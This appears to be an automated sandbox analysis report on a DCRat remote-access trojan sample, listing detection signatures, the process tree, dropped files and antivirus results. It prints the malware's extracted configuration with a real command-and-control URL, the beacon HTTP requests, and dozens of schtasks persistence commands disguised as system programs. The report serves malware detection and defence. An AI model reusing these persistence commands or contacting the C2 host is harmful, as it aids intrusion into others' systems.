
Windows Analysis Report
DFpUKTL6kg.exe

Overview

General Information

Sample name:DFpUKTL6kg.exe
renamed because original name is a hash value
Original sample name:23a1767d4e77693bd46f3abfcf10e4d7.exe
Analysis ID:1458153
MD5:23a1767d4e77693bd46f3abfcf10e4d7
SHA1:1be797ac1e5180f8bb51b359b7c8dc88daf2732e
SHA256:d675f72b0bc010f74a28dfb3401dd69dbae5d21a55624a827fa70d1041367d13
Tags:DCRatexe

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DFpUKTL6kg.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\DFpUKTL6kg.exe" MD5: 23A1767D4E77693BD46F3ABFCF10E4D7)
    • wscript.exe (PID: 7004 cmdline: "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 396 cmdline: C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • browsersvc.exe (PID: 6544 cmdline: "C:\chainSurrogate\browsersvc.exe" MD5: 05CF6D069F5B66212AF39C9D6C440CCE)
          • schtasks.exe (PID: 7156 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6980 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6884 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6848 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5928 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1696 cmdline: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6284 cmdline: schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6220 cmdline: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1456 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4248 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7080 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7004 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6520 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6280 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6980 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6884 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6848 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5928 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7140 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6300 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5264 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7104 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7072 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4484 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5852 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6316 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6936 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6960 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • UAhpvIJrmb.exe (PID: 6884 cmdline: "C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe" MD5: 05CF6D069F5B66212AF39C9D6C440CCE)
  • cleanup
{"SCRT": "{\"Q\":\"@\",\"3\":\",\",\"Z\":\"%\",\"c\":\"_\",\"G\":\"-\",\"v\":\"(\",\"C\":\";\",\"5\":\"^\",\"k\":\"*\",\"h\":\" \",\"S\":\")\",\"m\":\"&\",\"s\":\"~\",\"l\":\">\",\"8\":\"#\",\"g\":\".\",\"H\":\"|\",\"d\":\"`\",\"a\":\"$\",\"N\":\"<\",\"b\":\"!\"}", "PCRT": "{\"=\":\")\",\"M\":\"|\",\"0\":\"<\",\"D\":\"!\",\"f\":\">\",\"i\":\"-\",\"S\":\";\",\"6\":\".\",\"j\":\"%\",\"I\":\"#\",\"l\":\"^\",\"w\":\"~\",\"X\":\"@\",\"x\":\"(\",\"y\":\"&\",\"p\":\"$\",\"c\":\",\",\"Q\":\"_\",\"e\":\"`\",\"b\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-jI1oCiBH96aVG0N0JaCL", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://host1871899.hostland.pro/@==gbJBzYuFDT", "H2": "http://host1871899.hostland.pro/@==gbJBzYuFDT", "T": "0"}
Source | Rule | Description | Author | Strings
00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000002.1771032686.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: browsersvc.exe PID: 6544 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: UAhpvIJrmb.exe PID: 6884 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

            System Summary

            Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\chainSurrogate\browsersvc.exe, ProcessId: 6544, TargetFilename: C:\Recovery\RuntimeBroker.exe
            Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DFpUKTL6kg.exe", ParentImage: C:\Users\user\Desktop\DFpUKTL6kg.exe, ParentProcessId: 6848, ParentProcessName: DFpUKTL6kg.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" , ProcessId: 7004, ProcessName: wscript.exe

            Persistence and Installation Behavior

            Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\chainSurrogate\browsersvc.exe", ParentImage: C:\chainSurrogate\browsersvc.exe, ParentProcessId: 6544, ParentProcessName: browsersvc.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, ProcessId: 6300, ProcessName: schtasks.exe
            No Snort rule has matched

            AV Detection

            Source: DFpUKTL6kg.exe | Avira: detected
            Source: C:\chainSurrogate\browsersvc.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Windows\L2Schemas\OfficeClickToRun.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: 00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"Q\":\"@\",\"3\":\",\",\"Z\":\"%\",\"c\":\"_\",\"G\":\"-\",\"v\":\"(\",\"C\":\";\",\"5\":\"^\",\"k\":\"*\",\"h\":\" \",\"S\":\")\",\"m\":\"&\",\"s\":\"~\",\"l\":\">\",\"8\":\"#\",\"g\":\".\",\"H\":\"|\",\"d\":\"`\",\"a\":\"$\",\"N\":\"<\",\"b\":\"!\"}", "PCRT": "{\"=\":\")\",\"M\":\"|\",\"0\":\"<\",\"D\":\"!\",\"f\":\">\",\"i\":\"-\",\"S\":\";\",\"6\":\".\",\"j\":\"%\",\"I\":\"#\",\"l\":\"^\",\"w\":\"~\",\"X\":\"@\",\"x\":\"(\",\"y\":\"&\",\"p\":\"$\",\"c\":\",\",\"Q\":\"_\",\"e\":\"`\",\"b\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-jI1oCiBH96aVG0N0JaCL", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://host1871899.hostland.pro/@==gbJBzYuFDT", "H2": "http://host1871899.hostland.pro/@==gbJBzYuFDT", "T": "0"}
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe | ReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe | Virustotal: Detection: 69%
            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exe | ReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exe | Virustotal: Detection: 69%
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | ReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Virustotal: Detection: 69%
            Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe | ReversingLabs: Detection: 87%
            Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe | Virustotal: Detection: 69%
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe | ReversingLabs: Detection: 87%
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe | Virustotal: Detection: 69%
            Source: C:\Recovery\RuntimeBroker.exe | ReversingLabs: Detection: 87%
            Source: C:\Recovery\RuntimeBroker.exe | Virustotal: Detection: 69%
            Source: C:\Recovery\UAhpvIJrmb.exe | ReversingLabs: Detection: 87%
            Source: C:\Recovery\UAhpvIJrmb.exe | Virustotal: Detection: 69%
            Source: C:\Windows\L2Schemas\OfficeClickToRun.exe | ReversingLabs: Detection: 87%
            Source: C:\Windows\L2Schemas\OfficeClickToRun.exe | Virustotal: Detection: 69%
            Source: C:\chainSurrogate\UAhpvIJrmb.exe | ReversingLabs: Detection: 87%
            Source: C:\chainSurrogate\UAhpvIJrmb.exe | Virustotal: Detection: 69%
            Source: C:\chainSurrogate\browsersvc.exe | ReversingLabs: Detection: 87%
            Source: C:\chainSurrogate\browsersvc.exe | Virustotal: Detection: 69%
            Source: DFpUKTL6kg.exe | ReversingLabs: Detection: 73%
            Source: DFpUKTL6kg.exe | Virustotal: Detection: 59%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
            Source: C:\chainSurrogate\browsersvc.exe | Joe Sandbox ML: detected
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe | Joe Sandbox ML: detected
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe | Joe Sandbox ML: detected
            Source: C:\Windows\L2Schemas\OfficeClickToRun.exe | Joe Sandbox ML: detected
            Source: C:\Recovery\RuntimeBroker.exe | Joe Sandbox ML: detected
            Source: DFpUKTL6kg.exe | Joe Sandbox ML: detected
            Source: DFpUKTL6kg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\chainSurrogate\browsersvc.exe | Directory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe
            Source: C:\chainSurrogate\browsersvc.exe | Directory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\1b42ae2595212a
            Source: C:\chainSurrogate\browsersvc.exe | Directory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe
            Source: C:\chainSurrogate\browsersvc.exe | Directory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\5940a34987c991
            Source: DFpUKTL6kg.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DFpUKTL6kg.exe
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_009FA5F4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A0B8E0

            Networking

            Source: Malware configuration extractor | URLs: http://host1871899.hostland.pro/@==gbJBzYuFDT
            Source: Joe Sandbox View | ASN Name: HOSTLANDRU HOSTLANDRU
            Source: global traffic | HTTP traffic detected: GET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: host1871899.hostland.pro | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: host1871899.hostland.pro
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: host1871899.hostland.pro
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 17 Jun 2024 04:07:10 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: keep-alive | Status: 403 Forbidden by IP restrictions | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://host1871899.hostland.pro
            Source: UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://host1871899.hostland.pro/
            Source: UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=9
            Source: browsersvc.exe, 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009F718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_009F718C
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Windows\L2Schemas\OfficeClickToRun.exe
            Source: C:\chainSurrogate\browsersvc.exe | File created: C:\Windows\L2Schemas\e6c9b481da804f
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009F857B
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A070BF
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A1D00E
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009F407E
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A21194
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009F3281
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FE2A0
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A102F6
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A06646
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A037C1
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009F27E8
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A1473A
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A1070E
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FE8A0
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A14969
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FF968
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A03A3C
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A06A7B
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A1CB60
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A10B43
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A05C77
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A0FDFA
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FED14
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A03D6D
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FBE13
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009FDE6C
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009F5F3C
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_00A10F78
            Source: C:\chainSurrogate\browsersvc.exe | Code function: 4_2_00007FFD9BAB3555
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe | Code function: 35_2_00007FFD9BAB3555
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: String function: 00A0E360 appears 52 times
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: String function: 00A0ED00 appears 31 times
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: String function: 00A0E28C appears 35 times
            Source: browsersvc.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
